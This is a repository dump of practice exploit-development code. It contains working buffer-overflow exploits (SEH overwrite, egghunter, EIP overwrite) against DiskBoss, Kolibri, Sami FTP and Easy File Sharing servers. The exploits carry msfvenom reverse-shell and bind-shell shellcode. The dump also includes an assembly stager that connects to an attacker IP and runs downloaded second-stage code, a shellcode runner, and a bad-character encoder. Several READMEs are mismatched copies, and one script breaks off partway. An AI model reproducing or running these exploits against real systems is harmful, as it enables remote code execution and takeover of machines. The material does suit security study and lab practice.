├── README.md
├── SamiFTP
    ├── README.md
    └── Sami.py
├── DiskBoss
    ├── README.md
    └── DiskBoss.py
├── Kolibri_WinXP
    ├── README.md
    └── Kolibri.py
├── EasyFileSharing
    ├── README.md
    └── EFS.py
├── Practice
    ├── message_box.asm
    ├── shellcode.py
    ├── stager.asm
    └── shellcode_with_samples.py
└── Encoder
    ├── README.md
    └── encoder.py


/README.md:
--------------------------------------------------------------------------------
1 | # ExploitDev
2 | Practice exploit development and misc things
3 | 


--------------------------------------------------------------------------------
/SamiFTP/README.md:
--------------------------------------------------------------------------------
 1 | Kolibri 2.0
 2 | 
 3 | Buffer Overflow with EIP Overwrite
 4 | 
 5 | Based on TheLeader's contribution to exploit-db:
 6 | 
 7 | https://www.exploit-db.com/exploits/15834/
 8 | 
 9 | Development write-up:
10 | 
11 | https://www.chrismaddalena.com/2017/01/exploit-dev-kolibri-2-0-http-buffer-overflow
12 | 


--------------------------------------------------------------------------------
/DiskBoss/README.md:
--------------------------------------------------------------------------------
 1 | Kolibri 2.0
 2 | 
 3 | Buffer Overflow with EIP Overwrite
 4 | 
 5 | Based on TheLeader's contribution to exploit-db:
 6 | 
 7 | https://www.exploit-db.com/exploits/15834/
 8 | 
 9 | Development write-up:
10 | 
11 | https://www.chrismaddalena.com/2017/01/exploit-dev-kolibri-2-0-http-buffer-overflow
12 | 


--------------------------------------------------------------------------------
/Kolibri_WinXP/README.md:
--------------------------------------------------------------------------------
 1 | Kolibri 2.0
 2 | 
 3 | Buffer Overflow with EIP Overwrite
 4 | 
 5 | Based on TheLeader's contribution to exploit-db:
 6 | 
 7 | https://www.exploit-db.com/exploits/15834/
 8 | 
 9 | Development write-up:
10 | 
11 | https://www.chrismaddalena.com/2017/01/exploit-dev-kolibri-2-0-http-buffer-overflow
12 | 


--------------------------------------------------------------------------------
/EasyFileSharing/README.md:
--------------------------------------------------------------------------------
 1 | # Easy File Sharing Web Server v7.2
 2 | ## Buffer Overflow with EIP Overwrite
 3 | 
 4 | Based on ch3rnobyl's contribution to exploit-db:
 5 | 
 6 | https://www.exploit-db.com/exploits/40178/
 7 | 
 8 | Development write-up:
 9 | 
10 | https://www.chrismaddalena.com/2017/01/exploit-dev-easy-file-sharing-web-server-7-2-buffer-overflow/
11 | 


--------------------------------------------------------------------------------
/Practice/message_box.asm:
--------------------------------------------------------------------------------
 1 | [BITS 32]
 2 | 
 3 | XOR EAX,EAX					; Zero EAX
 4 | PUSH EAX						; PUSH 0 to terminate lpCaption
 5 | PUSH 0x3a737961			; PUSH "ays:"
 6 | PUSH 0x73206172			; PUSH "ra s"
 7 | PUSH 0x626d6f53			;	PUSH "Somb"
 8 | MOV ECX,ESP					; Save pointer to lpCaption
 9 | PUSH EAX						; PUSH 0 to terminate lpText
10 | PUSH 0x706f6f42			; PUSH "Boop"
11 | MOV EDX,ESP					; Save pointer to lpText
12 | PUSH EAX						; PUSH uType
13 | PUSH ECX						; PUSH lpCaption
14 | PUSH EDX						; PUSH lpText
15 | PUSH EAX						; PUSH hWnd
16 | MOV ESI,0x7e4507ea	; MOV ESI,USER32.MessageBoxA
17 | CALL ESI						; Execute MessageBoxA()
18 | 
19 | ; Exit cleanly
20 | PUSH EAX						; PUSH 0 for ExpitProcess(0)
21 | MOV EAX,0x7c81cafa	; MOV EAX,KERNEL32.ExitProcess()
22 | JMP EAX							; Execute ExitProcess(0)
23 | 


--------------------------------------------------------------------------------
/Practice/shellcode.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | import ctypes
 3 | 
 4 | # Insert shellcode to be tested here
 5 | # Shellcode must be \x formatted
 6 | # Uncomment the \xcc to enable analysis in a debugger
 7 | shellcode = bytearray(
 8 | # "\xcc"
 9 | 
10 | )
11 | 
12 | # Print the total length of the shellcode
13 | print "Total Length: ",len(shellcode)
14 | 
15 | # Pause just before shellcode execution and wait for key press
16 | # Attach the debugger to Python now!
17 | debug = raw_input("Debug pause!")
18 | 
19 | ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
20 | 										  ctypes.c_int(len(shellcode)),
21 | 										  ctypes.c_int(0x3000),
22 | 										  ctypes.c_int(0x40))
23 | 
24 | buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
25 | 
26 | ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
27 | 									 buf,
28 | 									 ctypes.c_int(len(shellcode)))
29 | 
30 | ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
31 | 										 ctypes.c_int(0),
32 | 										 ctypes.c_int(ptr),
33 | 										 ctypes.c_int(0),
34 | 										 ctypes.c_int(0),
35 | 										 ctypes.pointer(ctypes.c_int(0)))
36 | 
37 | try:
38 | 	ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
39 | except Exception as err:
40 | 	print(err)
41 | 


--------------------------------------------------------------------------------
/Encoder/README.md:
--------------------------------------------------------------------------------
 1 | ## PyEncoder
 2 | 
 3 | This script encodes shellcode with SUB EAX instructions. Provide shellcode in 4 byte chunks (DWORD) and a set of good characters and the script will produce the encoded version.
 4 | 
 5 | It is worth noting this is (sort of) a BRUTE FORCE method. It works like other encoding methods, but the script plays it fast and loose with some of the logic for the SUB instructions. 0x55 is subtracted from bad chars and 0x01 is subtracted from good chars. It works, but you may end up with more instructions than if you had done this by hand. If you are tight on space, then this could be an issue and you'll need to manually encode an instruction or two.
 6 | 
 7 | But it works.
 8 | 
 9 | ### The Output
10 | 
11 | The script will output an encoded.asm file with all of the encoded instructions. This is suitable for use with `nasm` to create a binary file.
12 | 
13 | `nasm encoded.asm -o encoded.bin`
14 | 
15 | Rather than assume the script is being run on a machine with `nasm` available, this is done separately.
16 | 
17 | ### Formatting Binary Instructions
18 | 
19 | Once you have run `nasm` and have your binary file, you can use the script to format your binary instructions into instructions suitable for copy/pasting directly into an exploit script ("\x" format).
20 | 
21 | As a bonus for this being a separate function, any binary file can be supplied. This is much like the pveReader.pl script featured in Corelan's Win32 shellcode tutorials, but it's Python.
22 | 
23 | `python encoder.py --format encoded.bin`
24 | 
25 | ### Sample Output
26 | 
27 | This line of egghunter shellcode:
28 | 
29 | >\x75\xe7\xff\xe7
30 | 
31 | Becomes these decoding instructions:
32 | 
33 | >AND EAX,0x554E4D4A
34 | 
35 | >AND EAX,0x2A313235
36 | 
37 | >SUB EAX,0x55555555
38 | 
39 | >SUB EAX,0x55555501
40 | 
41 | >SUB EAX,0x6d556e35
42 | 
43 | >PUSH EAX
44 | 
45 | Once those results are sent through `nasm` and then formatted:
46 | 
47 | >\x25\x4a\x4d\x4e\x55
48 | 
49 | >\x25\x35\x32\x31\x2a
50 | 
51 | >\x2d\x55\x55\x55\x55
52 | 
53 | >\x2d\x01\x55\x55\x55
54 | 
55 | >\x2d\x35\x6e\x55\x6d
56 | 
57 | >\x50
58 | 


--------------------------------------------------------------------------------
/Practice/stager.asm:
--------------------------------------------------------------------------------
 1 | [BITS 32]
 2 | 
 3 | ; Execute WSAStartup
 4 | 
 5 | XOR EBX,EBX         	; Zero EBX
 6 | MOV BX,0x0190       	; Set lower bytes to 0x0190
 7 | SUB ESP,EBX         	; Subtract EBX from ESP
 8 | PUSH ESP            	; Push ESP for lsWSAData
 9 | PUSH EBX            	; Push EBX for wVersion Requested
10 | MOV EBX,0x71AB6A55  	; MOV EAX,WS2_32.WSAStartUp
11 | CALL EBX            	; Call WSAStartUp
12 | 
13 | ; Setup a new socket using WSASocketA
14 | ; If no error occurs, WSASocketA returns a descriptor
15 | 
16 | XOR EDI,EDI 					; Set EDI to NULL
17 | PUSH EDI							; Push dwFlags arg — 0 means no flags
18 | PUSH EDI							; Push g arg — 0 means no group operation
19 | PUSH EDI							; Push lpProtocolInfo arg — NULL
20 | PUSH EDI							; Push the protocol arg — 0 means no protocol specified
21 | INC EDI								; Increment EDI to 1
22 | PUSH EDI							; Push the type argument as 1 (SOCK_STREAM)
23 | INC EDI								; Increment EDI to 2
24 | PUSH EDI							; Push af argument as 2 (AF_NET)
25 | MOV EBX,0x71AB8B6A  	; MOV EAX,WS2_32.WSASocketA
26 | CALL EBX							; CALL WSASocketA
27 | 
28 | ; DEBUG
29 | 
30 | ; MOV EBX,0x71AB3CCE	; MOV EAX,WS2_32.WSAGetLastError
31 | ; CALL EBX            ; CALL WSAGetLastError
32 | 
33 | ; DEBUG
34 | 
35 | MOV EDI,EAX 					; Save socket descriptor in EDI
36 | 
37 | ; Initiate a connection with connect()
38 | 
39 | PUSH 0x84C1A8C0				; Push attacker’s IP address — 192.168.193.132
40 | MOV EAX,0x5C110102		; Mov the port and address family attributes -- default port is 4444
41 | DEC AH								; Fix the address family attribute — make it 0x5c110002
42 | PUSH EAX 							; Push port and family to stack
43 | MOV EDX,ESP 					; Save the pointer to the stack in EDX
44 | XOR EAX,EAX 					; Zero EAX
45 | MOV AL,0x10 					; Set the low byte of EAX to 0x10 which is the size of struct sockaddr
46 | PUSH EAX 							; Push the namelen argument as 0x10
47 | PUSH EDX 							; Push the name argument as the pointer to the struct sockaddr in on the stack
48 | PUSH EDI 							; Push the socket descriptor returned from WSASocketA
49 | MOV EBX,0x71AB4A07  	; MOV EAX,WS2_32.connect
50 | CALL EBX							; CALL connect
51 | 
52 | ; DEBUG
53 | 
54 | ; MOV EBX,0x71AB3CCE  ; MOV EAX,WS2_32.WSAGetLastError
55 | ; CALL EBX            ; CALL WSAGetLastError
56 | 
57 | ; DEBUG
58 | 
59 | ; Use recv() to receive the new buffer of stage 2 shellcode
60 | 
61 | INC AH								; Increment EAX to 0x0100 as connect should have returned 0
62 | INC AH								; Increment EAX to 0x1000 for 4096
63 | SUB ESP,EAX 					; Allocate 4096 bytes of stack space for use in the recv call
64 | MOV EBP,ESP 					; Save the pointer to the buffer in EBP
65 | XOR ECX,ECX 					; Zero ECX for use as the flags argument
66 | PUSH ECX 							; Push flags arg -- 0 for no flags
67 | PUSH EAX 							; Push len arg -- Size of the buffer for incoming shellcode, 4096
68 | PUSH EBP 							; Push buf arg -- Pointer to output buffer
69 | PUSH EDI 							; Push s arg -- Descriptor returned by WSASocketA
70 | MOV EBX,0x71AB676F  	; MOV EAX,WS2_32.recv
71 | CALL EBX 							; CALL recv
72 | 
73 | ; Jump to the stage 2 shellcode and execute
74 | 
75 | JMP EBP 							; Jump into the buffer that was read.
76 | 


--------------------------------------------------------------------------------
/DiskBoss/DiskBoss.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 |  
 3 | # Exploit Title: DiskBoss Enterprise 7.5.12 SEH + Egghunter Buffer Overflow
 4 | # Date: 10-01-2017
 5 | # Exploit Author: Wyndell Bibera
 6 | # Software Link: http://www.diskboss.com/setups/diskbossent_setup_v7.5.12.exe
 7 | # Version: 7.5.12
 8 | # Tested on: Windows XP Professional SP3
 9 | 
10 | import socket
11 | 
12 | ip = "192.168.37.131"
13 | port = 80
14 | 
15 | # msfvenom -p windows/shell_reverse_tcp -b "\x00\x09\x0a\x0d\x20" LHOST=192.168.37.130 LPORT=443 -f c
16 | # Payload size: 351 bytes
17 | shellcode = (
18 | "\x90\x90\x90\x90\x90\x90\x90\x90"
19 | "\xda\xde\xd9\x74\x24\xf4\xbd\xc9\xdb\xbb\x38\x58\x33\xc9\xb1"
20 | "\x52\x83\xe8\xfc\x31\x68\x13\x03\xa1\xc8\x59\xcd\xcd\x07\x1f"
21 | "\x2e\x2d\xd8\x40\xa6\xc8\xe9\x40\xdc\x99\x5a\x71\x96\xcf\x56"
22 | "\xfa\xfa\xfb\xed\x8e\xd2\x0c\x45\x24\x05\x23\x56\x15\x75\x22"
23 | "\xd4\x64\xaa\x84\xe5\xa6\xbf\xc5\x22\xda\x32\x97\xfb\x90\xe1"
24 | "\x07\x8f\xed\x39\xac\xc3\xe0\x39\x51\x93\x03\x6b\xc4\xaf\x5d"
25 | "\xab\xe7\x7c\xd6\xe2\xff\x61\xd3\xbd\x74\x51\xaf\x3f\x5c\xab"
26 | "\x50\x93\xa1\x03\xa3\xed\xe6\xa4\x5c\x98\x1e\xd7\xe1\x9b\xe5"
27 | "\xa5\x3d\x29\xfd\x0e\xb5\x89\xd9\xaf\x1a\x4f\xaa\xbc\xd7\x1b"
28 | "\xf4\xa0\xe6\xc8\x8f\xdd\x63\xef\x5f\x54\x37\xd4\x7b\x3c\xe3"
29 | "\x75\xda\x98\x42\x89\x3c\x43\x3a\x2f\x37\x6e\x2f\x42\x1a\xe7"
30 | "\x9c\x6f\xa4\xf7\x8a\xf8\xd7\xc5\x15\x53\x7f\x66\xdd\x7d\x78"
31 | "\x89\xf4\x3a\x16\x74\xf7\x3a\x3f\xb3\xa3\x6a\x57\x12\xcc\xe0"
32 | "\xa7\x9b\x19\xa6\xf7\x33\xf2\x07\xa7\xf3\xa2\xef\xad\xfb\x9d"
33 | "\x10\xce\xd1\xb5\xbb\x35\xb2\x79\x93\x10\xc0\x12\xe6\x5a\xc5"
34 | "\x59\x6f\xbc\xaf\x8d\x26\x17\x58\x37\x63\xe3\xf9\xb8\xb9\x8e"
35 | "\x3a\x32\x4e\x6f\xf4\xb3\x3b\x63\x61\x34\x76\xd9\x24\x4b\xac"
36 | "\x75\xaa\xde\x2b\x85\xa5\xc2\xe3\xd2\xe2\x35\xfa\xb6\x1e\x6f"
37 | "\x54\xa4\xe2\xe9\x9f\x6c\x39\xca\x1e\x6d\xcc\x76\x05\x7d\x08"
38 | "\x76\x01\x29\xc4\x21\xdf\x87\xa2\x9b\x91\x71\x7d\x77\x78\x15"
39 | "\xf8\xbb\xbb\x63\x05\x96\x4d\x8b\xb4\x4f\x08\xb4\x79\x18\x9c"
40 | "\xcd\x67\xb8\x63\x04\x2c\xc8\x29\x04\x05\x41\xf4\xdd\x17\x0c"
41 | "\x07\x08\x5b\x29\x84\xb8\x24\xce\x94\xc9\x21\x8a\x12\x22\x58"
42 | "\x83\xf6\x44\xcf\xa4\xd2"
43 | )
44 | 
45 | # 1002A66B POP POP POP RETN
46 | seh = "\x6b\xa6\x02\x10"
47 | nseh = "\xEB\x06\x90\x90"
48 | 
49 | egg = "DAMCDAMC"
50 | 
51 | egghunter = (
52 | "\x90\x90\x90\x90"
53 | "\x66\x81\xca\xff"
54 | "\x0f\x42\x52\x6a"
55 | "\x02\x58\xcd\x2e"
56 | "\x3c\x05\x5a\x74"
57 | "\xef\xb8\x44\x41"
58 | "\x4d\x43\x8b\xfa"
59 | "\xaf\x75\xea\xaf"
60 | "\x75\xe7\xff\xe7"
61 | )
62 | 
63 | seh_offset = "A"*(2492 - len(nseh) - len(egg) - len(shellcode))
64 | 
65 | buffer = egg + shellcode + seh_offset + nseh + seh + egghunter + "A"*(5000 - len(seh_offset) - len(seh) - len(nseh) - len(egg) - len(egghunter) - len(shellcode))
66 | 
67 | request = (
68 | "POST " + buffer + " HTTP/1.1\r\n"
69 | "Host: :192.168.37.131\r\n"
70 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
71 | "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*    ;q=0.8\r\n\r\n")
72 |  
73 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
74 | s.connect((ip, port))
75 | s.send(request)
76 | s.close()
77 | 


--------------------------------------------------------------------------------
/Kolibri_WinXP/Kolibri.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | # Exploit Title: Kolibri v2.0 Buffer Overflow
 4 | # Date: 31/1/2017
 5 | # Affected Version: Kolibri-2.0
 6 | # Tested on: Windows XP SP3 ENG
 7 | 
 8 | import socket
 9 | import sys
10 | from struct import pack
11 | from time import sleep
12 | from subprocess import call
13 | 
14 | print "\n  Kolibri v2.0 Buffer Overflow exploit"
15 | 
16 | host = ""
17 | port = 8080
18 | 
19 | eip_offset = 515
20 | seh_offset = 787
21 | 
22 | # CALL ESP 0x7C8369F0 in kernel32.dll
23 | ret = pack('<L', 0x7C8369F0)
24 | 
25 | # egghunt.exe cstyle 0x434D4144
26 | hunter = ("\x90\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x44\x41\x4d\x43\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
27 | egg = "DAMCDAMC"
28 | 
29 | nops = "\x90\x90\x90\x90\x90"
30 | 
31 | shellcode = ("\x6a\x52\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x22\xae"
32 | "\xb8\x9d\x83\xeb\xfc\xe2\xf4\xde\x46\x3a\x9d\x22\xae\xd8\x14"
33 | "\xc7\x9f\x78\xf9\xa9\xfe\x88\x16\x70\xa2\x33\xcf\x36\x25\xca"
34 | "\xb5\x2d\x19\xf2\xbb\x13\x51\x14\xa1\x43\xd2\xba\xb1\x02\x6f"
35 | "\x77\x90\x23\x69\x5a\x6f\x70\xf9\x33\xcf\x32\x25\xf2\xa1\xa9"
36 | "\xe2\xa9\xe5\xc1\xe6\xb9\x4c\x73\x25\xe1\xbd\x23\x7d\x33\xd4"
37 | "\x3a\x4d\x82\xd4\xa9\x9a\x33\x9c\xf4\x9f\x47\x31\xe3\x61\xb5"
38 | "\x9c\xe5\x96\x58\xe8\xd4\xad\xc5\x65\x19\xd3\x9c\xe8\xc6\xf6"
39 | "\x33\xc5\x06\xaf\x6b\xfb\xa9\xa2\xf3\x16\x7a\xb2\xb9\x4e\xa9"
40 | "\xaa\x33\x9c\xf2\x27\xfc\xb9\x06\xf5\xe3\xfc\x7b\xf4\xe9\x62"
41 | "\xc2\xf1\xe7\xc7\xa9\xbc\x53\x10\x7f\xc6\x8b\xaf\x22\xae\xd0"
42 | "\xea\x51\x9c\xe7\xc9\x4a\xe2\xcf\xbb\x25\x51\x6d\x25\xb2\xaf"
43 | "\xb8\x9d\x0b\x6a\xec\xcd\x4a\x87\x38\xf6\x22\x51\x6d\xf7\x2a"
44 | "\xf7\xe8\x7f\xdf\xee\xe8\xdd\x72\xc6\x52\x92\xfd\x4e\x47\x48"
45 | "\xb5\xc6\xba\x9d\x33\xf2\x31\x7b\x48\xbe\xee\xca\x4a\x6c\x63"
46 | "\xaa\x45\x51\x6d\xca\x4a\x19\x51\xa5\xdd\x51\x6d\xca\x4a\xda"
47 | "\x54\xa6\xc3\x51\x6d\xca\xb5\xc6\xcd\xf3\x6f\xcf\x47\x48\x4a"
48 | "\xcd\xd5\xf9\x22\x27\x5b\xca\x75\xf9\x89\x6b\x48\xbc\xe1\xcb"
49 | "\xc0\x53\xde\x5a\x66\x8a\x84\x9c\x23\x23\xfc\xb9\x32\x68\xb8"
50 | "\xd9\x76\xfe\xee\xcb\x74\xe8\xee\xd3\x74\xf8\xeb\xcb\x4a\xd7"
51 | "\x74\xa2\xa4\x51\x6d\x14\xc2\xe0\xee\xdb\xdd\x9e\xd0\x95\xa5"
52 | "\xb3\xd8\x62\xf7\x15\x48\x28\x80\xf8\xd0\x3b\xb7\x13\x25\x62"
53 | "\xf7\x92\xbe\xe1\x28\x2e\x43\x7d\x57\xab\x03\xda\x31\xdc\xd7"
54 | "\xf7\x22\xfd\x47\x48")
55 | 
56 | buf =  "A"*(515) + ret + hunter #+ "B"*(800-515-len(ret)-len(hunter))
57 | 
58 | stage2 = egg + shellcode + "A"*(1000- len(shellcode) - len(egg))
59 | 
60 | # "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
61 | req = ("HEAD /" + buf + " HTTP/1.1\r\n"
62 | "Host: " + host + ":" + str(port) + "\r\n"
63 | "User-Agent: " + stage2 + "\r\n"
64 | "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
65 | "Accept-Language: he,en-us;q=0.7,en;q=0.3\r\n"
66 | "Accept-Encoding: gzip,deflate\r\n"
67 | "Accept-Charset: windows-1255,utf-8;q=0.7,*;q=0.7\r\n"
68 | "Keep-Alive: 115\r\n"
69 | "Connection: keep-alive\r\n\r\n")
70 | 
71 | print "  [+] Connecting to %s:%d" % (host, port)
72 | 
73 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
74 | s.connect((host, port))
75 | 
76 | print "  [+] Sending payload.."
77 | s.send(req)
78 | data = s.recv(1024)
79 | 
80 | print "  [+] Closing connection.."
81 | s.close()
82 | 
83 | print "  [+] Done!"
84 | 
85 | try:
86 | 	print '  [+] Trying to connect to target...\n'
87 |         try:
88 | 		sleep(2)
89 | 		call(['nc', host, '4444'])
90 |         except:
91 |                 print '  [!] Whoops!! Something went wrong?'
92 | except:
93 |         print '  [!] Whoops!! Something went wrong?'
94 | 


--------------------------------------------------------------------------------
/SamiFTP/Sami.py:
--------------------------------------------------------------------------------
 1 | #/usr/bin/python
 2 | #-*- Coding: utf-8 -*-
 3 | import socket
 4 | import struct
 5 | from struct import pack
 6 | 
 7 | # 0x1001B2B6      pop EBP - pop - ret
 8 | ret = pack('<L', 0x1001B2B6)
 9 | 
10 | # SEH offsets
11 | seh = "A"*(600 - len(ret))
12 | 
13 | # nSEH short jump
14 | nseh = "\xEB\x06\x90\x90"
15 | 
16 | # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.37.130 LPORT=443 -b "\x00\x20\x09\x0A\x0D\xFF\x22" -f c
17 | shellcode = (
18 | "\x90\x90\x90\x90\x90\x90"
19 | "\x89\xe2\xda\xdc\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
20 | "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
21 | "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
22 | "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
23 | "\x6b\x4c\x78\x68\x6c\x42\x35\x50\x63\x30\x33\x30\x33\x50\x4b"
24 | "\x39\x79\x75\x55\x61\x79\x50\x70\x64\x4c\x4b\x36\x30\x54\x70"
25 | "\x6c\x4b\x66\x32\x54\x4c\x6e\x6b\x51\x42\x77\x64\x6c\x4b\x54"
26 | "\x32\x46\x48\x46\x6f\x78\x37\x30\x4a\x47\x56\x44\x71\x6b\x4f"
27 | "\x4e\x4c\x65\x6c\x51\x71\x43\x4c\x35\x52\x36\x4c\x65\x70\x4b"
28 | "\x71\x5a\x6f\x56\x6d\x77\x71\x38\x47\x6b\x52\x6a\x52\x51\x42"
29 | "\x70\x57\x6c\x4b\x72\x72\x56\x70\x4e\x6b\x61\x5a\x47\x4c\x6c"
30 | "\x4b\x72\x6c\x57\x61\x44\x38\x59\x73\x63\x78\x43\x31\x48\x51"
31 | "\x46\x31\x4e\x6b\x76\x39\x75\x70\x46\x61\x48\x53\x6c\x4b\x53"
32 | "\x79\x32\x38\x4a\x43\x66\x5a\x31\x59\x4e\x6b\x44\x74\x4c\x4b"
33 | "\x75\x51\x39\x46\x56\x51\x49\x6f\x6e\x4c\x59\x51\x6a\x6f\x64"
34 | "\x4d\x67\x71\x79\x57\x55\x68\x6b\x50\x51\x65\x49\x66\x45\x53"
35 | "\x71\x6d\x39\x68\x77\x4b\x63\x4d\x65\x74\x31\x65\x68\x64\x42"
36 | "\x78\x6e\x6b\x56\x38\x65\x74\x35\x51\x4a\x73\x53\x56\x4c\x4b"
37 | "\x66\x6c\x42\x6b\x6e\x6b\x72\x78\x35\x4c\x76\x61\x58\x53\x6c"
38 | "\x4b\x55\x54\x4c\x4b\x36\x61\x4a\x70\x6b\x39\x47\x34\x65\x74"
39 | "\x54\x64\x63\x6b\x61\x4b\x73\x51\x50\x59\x43\x6a\x43\x61\x69"
40 | "\x6f\x6d\x30\x43\x6f\x71\x4f\x52\x7a\x4c\x4b\x44\x52\x4a\x4b"
41 | "\x4c\x4d\x71\x4d\x71\x78\x37\x43\x50\x32\x73\x30\x75\x50\x32"
42 | "\x48\x73\x47\x52\x53\x30\x32\x51\x4f\x33\x64\x42\x48\x50\x4c"
43 | "\x71\x67\x36\x46\x76\x67\x4b\x4f\x48\x55\x4d\x68\x4c\x50\x75"
44 | "\x51\x67\x70\x33\x30\x76\x49\x78\x44\x31\x44\x72\x70\x50\x68"
45 | "\x55\x79\x6b\x30\x52\x4b\x57\x70\x39\x6f\x48\x55\x72\x70\x50"
46 | "\x50\x42\x70\x66\x30\x61\x50\x42\x70\x67\x30\x70\x50\x42\x48"
47 | "\x39\x7a\x64\x4f\x39\x4f\x59\x70\x6b\x4f\x5a\x75\x6e\x77\x71"
48 | "\x7a\x67\x75\x65\x38\x69\x50\x49\x38\x71\x35\x4f\x72\x53\x58"
49 | "\x55\x52\x35\x50\x57\x71\x4d\x6b\x4c\x49\x7a\x46\x70\x6a\x42"
50 | "\x30\x66\x36\x43\x67\x73\x58\x6e\x79\x69\x35\x42\x54\x51\x71"
51 | "\x49\x6f\x78\x55\x6d\x55\x39\x50\x64\x34\x76\x6c\x6b\x4f\x72"
52 | "\x6e\x45\x58\x61\x65\x58\x6c\x63\x58\x58\x70\x58\x35\x69\x32"
53 | "\x31\x46\x4b\x4f\x78\x55\x30\x68\x63\x53\x32\x4d\x55\x34\x35"
54 | "\x50\x4f\x79\x59\x73\x72\x77\x32\x77\x71\x47\x75\x61\x59\x66"
55 | "\x71\x7a\x54\x52\x73\x69\x71\x46\x7a\x42\x69\x6d\x45\x36\x78"
56 | "\x47\x37\x34\x45\x74\x55\x6c\x53\x31\x57\x71\x6e\x6d\x51\x54"
57 | "\x47\x54\x52\x30\x5a\x66\x73\x30\x77\x34\x50\x54\x56\x30\x76"
58 | "\x36\x62\x76\x76\x36\x73\x76\x76\x36\x70\x4e\x53\x66\x62\x76"
59 | "\x61\x43\x56\x36\x70\x68\x51\x69\x4a\x6c\x57\x4f\x6f\x76\x49"
60 | "\x6f\x39\x45\x6d\x59\x49\x70\x62\x6e\x61\x46\x30\x46\x59\x6f"
61 | "\x46\x50\x70\x68\x77\x78\x6c\x47\x77\x6d\x63\x50\x69\x6f\x7a"
62 | "\x75\x4f\x4b\x4c\x30\x6d\x65\x49\x32\x46\x36\x30\x68\x39\x36"
63 | "\x4c\x55\x6d\x6d\x4d\x4d\x49\x6f\x78\x55\x35\x6c\x54\x46\x51"
64 | "\x6c\x57\x7a\x4d\x50\x49\x6b\x39\x70\x70\x75\x53\x35\x6f\x4b"
65 | "\x73\x77\x76\x73\x30\x72\x62\x4f\x53\x5a\x57\x70\x43\x63\x39"
66 | "\x6f\x7a\x75\x41\x41"
67 | )
68 | 
69 | payload = seh + nseh + ret + shellcode + "\xcc"*(5000 - len(seh) - len(nseh) - len(ret) - len(shellcode))
70 | 
71 | try:
72 | 	s = socket.create_connection(("192.168.37.129", 21))
73 | 	s.send("USER "+ payload +"\r\n" )
74 | 	print s.recv(4096)
75 |         
76 | 	s.send("PASS "+ payload +"\r\n" )
77 | 	print s.recv(4096)
78 | 	print s.recv(4096)
79 | except e:
80 | 	print str(e)
81 | 	exit("[+] Couldn't connect")
82 | 


--------------------------------------------------------------------------------
/EasyFileSharing/EFS.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | # Exploit Title: Easy File Sharing Web Server 7.2 Buffer Overflow
 3 | # Date: January 29, 2017
 4 | # Exploit Author: cmaddy
 5 | # Vendor Homepage: http://www.sharing-file.com/
 6 | # Software Link: http://www.sharing-file.com/download.php
 7 | # Version: 7.2
 8 | # Tested on: Windows 10
 9 | 
10 | from socket import socket, AF_INET, SOCK_STREAM
11 | from sys import argv
12 | from struct import pack
13 | from time import sleep
14 | from subprocess import call
15 | 
16 | host = argv[1]
17 | 
18 | # msfvenom -p windows/shell_bind_tcp -e x86/alpha_mixed -f c
19 | # 718 bytes
20 | # This doesn't won't work for you :)
21 | 
22 | shellcode = ("\x88\xe5\xdb\xd9\xd9\x75\xf4\x5b\x53\x59\x49\x49\x49\x49\x49"
23 | "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
24 | "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
25 | "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
26 | "\x79\x6c\x68\x68\x4e\x62\x57\x70\x55\x50\x75\x50\x45\x30\x4f"
27 | "\x79\x69\x75\x74\x71\x69\x50\x73\x54\x6c\x4b\x62\x70\x36\x50"
28 | "\x4c\x4b\x46\x32\x54\x4c\x6e\x6b\x72\x72\x66\x74\x6e\x6b\x50"
29 | "\x72\x57\x58\x36\x6a\x48\x37\x73\x7a\x65\x76\x50\x31\x6b\x4f"
30 | "\x6c\x6c\x65\x6c\x33\x51\x63\x4c\x66\x62\x44\x6c\x55\x70\x6b"
31 | "\x71\x38\x4f\x66\x6d\x56\x61\x49\x57\x6d\x33\x6b\x42\x72\x72"
32 | "\x62\x77\x4c\x4b\x53\x62\x62\x30\x4e\x6b\x42\x6a\x67\x4c\x4e"
33 | "\x6b\x32\x6c\x44\x51\x63\x48\x38\x63\x47\x38\x46\x61\x5a\x71"
34 | "\x32\x71\x6c\x4b\x31\x49\x51\x30\x73\x31\x6e\x33\x4c\x4b\x47"
35 | "\x39\x77\x68\x48\x62\x34\x7a\x51\x59\x6e\x6b\x54\x74\x6c\x4b"
36 | "\x77\x71\x6e\x36\x45\x61\x39\x6f\x4c\x6c\x5a\x61\x5a\x6f\x36"
37 | "\x6d\x77\x71\x38\x47\x70\x38\x4b\x50\x54\x45\x59\x66\x33\x33"
